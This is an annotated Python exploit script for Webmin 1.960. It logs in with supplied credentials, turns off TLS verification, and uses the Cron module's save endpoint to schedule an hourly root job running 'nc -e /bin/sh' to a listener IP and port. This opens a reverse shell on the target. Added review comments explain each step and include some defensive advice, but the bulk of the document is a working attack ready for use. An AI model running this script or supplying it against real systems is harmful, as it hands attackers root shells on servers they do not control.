# Exploit Title: Webmin 1.960 - Remote Code Execution (Authenticated)
# Date: 2020-10-23
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.webmin.com
# Software Link: https://netix.dl.sourceforge.net/project/webadmin/webmin/1.960/webmin_1.960_all.deb
# Version: 1.960
# Tested on: Kali Linux & Ubuntu 18.04.5
# CVE: N/A

# ----- Exploit -----

#!/usr/bin/python3

import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
from urllib3.exceptions import InsecureRequestWarning

# Warning suppression for the run. Every request in this script passes
# verify=False, so urllib3 would otherwise print an InsecureRequestWarning per
# call; bs4's UserWarning category is muted as well.
# NOTE(review): silencing these hides the fact that the TLS peer is never
# authenticated, so credentials may be sent to an unverified endpoint.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

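# All five positional arguments are required; stop before any network
# activity when one is missing.
if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    # sys.exit replaces the site-provided exit() helper, which is intended for
    # interactive sessions and is absent under `python -S`. The non-zero status
    # lets a calling shell or wrapper see that nothing was run.
    sys.exit(1)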

# Positional arguments, in the order shown by the usage line: base URL of the
# Webmin instance, Webmin account name and password, then the address and port
# that are later concatenated into the cron command.
# NOTE(review): a password taken from argv stays in shell history and is
# visible in the process list for the lifetime of the run.
url, username, password, ip, port = (
    sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5]
)

# Extra headers attached to the cron request. Referer and X-Progressive-URL
# are derived from the target's own base URL; the X-Requested-* values name
# the "webmin" tab, the "cron" module and an XMLHttpRequest origin.
# NOTE(review): presumably these mirror what the Webmin web UI sends for a
# same-site request - confirm against a captured browser session.
custom_header = {
    "Referer": f"{url}/cron/edit_cron.cgi?new=1&search=&xnavigation=1",
    "X-Progressive-URL": f"{url}/cron/save_cron.cgi",
    "X-Requested-From-Tab": "webmin",
    "X-Requested-From": "cron",
    "X-Requested-With": "XMLHttpRequest",
}

# A single requests session is used for the whole run, so cookies set by the
# server are also kept in the session's own cookie jar between requests.
req = requests.session()
# Form fields posted to the login endpoint below.
login_creds = {
    "user":username,
    "pass":password,
	}
      
# Unauthenticated GET of the base URL; the cookies from this response are
# handed explicitly to the login POST.
# NOTE(review): presumably Webmin expects a pre-login cookie - confirm.
# verify=False disables TLS certificate validation here and on every later
# request, so the credentials are sent without authenticating the server.
get_cookie = req.get(url,verify=False)
cookies = get_cookie.cookies

print("[+] Sendin login request...")
# The second positional argument of Session.post is `data`, so login_creds is
# sent as a form-encoded request body.
login = req.post(url + "/session_login.cgi", login_creds, verify = False,cookies = cookies)


# Login success is inferred only from the absence of the string "Warning!" in
# the response body; neither the status code nor a session cookie is checked.
if "Warning!" not in login.text:


    # Query string for the Cron module's save endpoint. It requests a new job
    # (new=1) owned by root (user=root) and marked active (active=1), whose
    # command (cmd=) is a URL-encoded netcat invocation that attaches /bin/sh
    # to a connection back to ip:port. The remaining fields are schedule
    # inputs (special=hourly, special_def=0, all_*=1); which schedule Webmin
    # derives from them is not visible in this file.
    # NOTE(review): the request carries only ordinary form fields, so this
    # looks like use of the module's normal job-creation feature by an
    # authenticated account rather than an injection flaw - confirm against
    # the vendor's assessment. For defenders: limit which Webmin accounts may
    # use the Cron module and which Unix users they may manage, and review
    # root's crontab and the Webmin request logs for save_cron.cgi calls that
    # carry a cmd= parameter.
    payload = "/cron/save_cron.cgi?new=1&idx=&search=&user=root&active=1&cmd=nc%20-e%20%2Fbin%2Fsh%20" + ip + "%20" + port + "&input=&comment=&special=hourly&special_def=0&all_mins=1&all_hours=1&all_days=1&all_months=1&all_weekdays=1&range_def=1&range_start_day=&range_start_month=1&range_start_year=&range_end_day=&range_end_month=1&range_end_year=&undefined="
    page = url + payload
    # The state-changing request is a single GET. It passes the cookies of the
    # login response explicitly, in addition to the session's cookie jar, and
    # adds the custom headers built earlier in the script.
    req2 = req.get(page,verify = False,cookies=login.cookies,headers=custom_header)
    # Both messages are printed after the request has already been sent, and
    # req2 is never inspected, so the script cannot tell whether the job was
    # actually saved.
    print("[+] Sending payload...")
    print("[+] Check your listener !...")

else:
    # Reached whenever the login response contains "Warning!"; the script does
    # not distinguish bad credentials from any other cause.
    print("[-] Wrong credentials or may the system patched.")
    exit()